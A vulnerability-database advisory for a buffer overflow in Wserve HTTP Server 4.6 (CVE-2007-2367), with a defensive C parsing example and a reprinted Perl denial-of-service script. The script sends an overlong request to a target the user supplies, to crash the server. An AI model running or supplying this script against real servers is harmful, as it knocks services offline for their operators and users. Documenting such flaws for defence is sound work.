Wserve HTTP Server GET Request Remote Overflow Vulnerability

Vulnerability ID: 1112633
Vulnerability type: Buffer overflow
Published: 2007-04-05
Updated: 2007-05-09
CVE ID: CVE-2007-2367
CNNVD-ID: CNNVD-200704-601
Platform: Windows
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/3674
https://cxsecurity.com/issue/WLB-2007050001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-601
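|Vulnerability details
Wserve HTTP Server is a simple HTTP server for the Windows platform. Submitting a malformed GET request containing an overlong directory name to Wserve HTTP Server may trigger a buffer overflow, causing a denial of service on the server.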
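A length-checked way to parse the request target, so that an overlong directory name is rejected with 414 instead of being copied into a fixed buffer. This is an added example, not Wserve's code; the function names, status enum and the `MAX_TARGET` limit are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define MAX_TARGET 255  /* assumed limit for this example */

/* Values mirror the HTTP status a server would answer with. */
enum parse_status { PARSE_OK = 200, PARSE_BAD_REQUEST = 400, PARSE_URI_TOO_LONG = 414 };

/*
 * Copy the request target of "GET <target> HTTP/1.x" into out.
 * Operates on an explicit (buf, len) pair, so it never reads past the
 * bytes actually received and never writes more than out_len bytes.
 */
enum parse_status parse_get_target(const char *buf, size_t len,
                                   char *out, size_t out_len)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof method - 1;

    if (out_len == 0)
        return PARSE_BAD_REQUEST;
    out[0] = '\0';
    if (len < mlen || memcmp(buf, method, mlen) != 0)
        return PARSE_BAD_REQUEST;

    const char *start = buf + mlen;
    size_t remaining = len - mlen;
    const char *end = memchr(start, ' ', remaining);  /* end of target */
    if (end == NULL)                  /* no terminator in received bytes */
        return remaining > MAX_TARGET ? PARSE_URI_TOO_LONG : PARSE_BAD_REQUEST;

    size_t tlen = (size_t)(end - start);
    if (tlen == 0 || start[0] != '/')
        return PARSE_BAD_REQUEST;
    if (tlen > MAX_TARGET || tlen >= out_len)  /* check length before copying */
        return PARSE_URI_TOO_LONG;
    memcpy(out, start, tlen);
    out[tlen] = '\0';
    return PARSE_OK;
}

/* Constructed sample: "GET /" + n 'A' bytes + " HTTP/1.0\r\n", parsed in memory. */
enum parse_status parse_long_sample(size_t n)
{
    char req[4096], out[MAX_TARGET + 1];
    if (n > sizeof req - 32)
        return PARSE_BAD_REQUEST;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', n);
    memcpy(req + 5 + n, " HTTP/1.0\r\n", 11);
    return parse_get_target(req, 5 + n + 11, out, sizeof out);
}
```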
|Vulnerability exploit (EXP)
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000]. 
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue 
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-05]
|References

Source: BID
Name: 23341
Link: http://www.securityfocus.com/bid/23341
Source: BUGTRAQ
Name: 20070405 Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
Link: http://www.securityfocus.com/archive/1/archive/1/464819/100/0/threaded
Source: SREASON
Name: 2647
Link: http://securityreason.com/securityalert/2647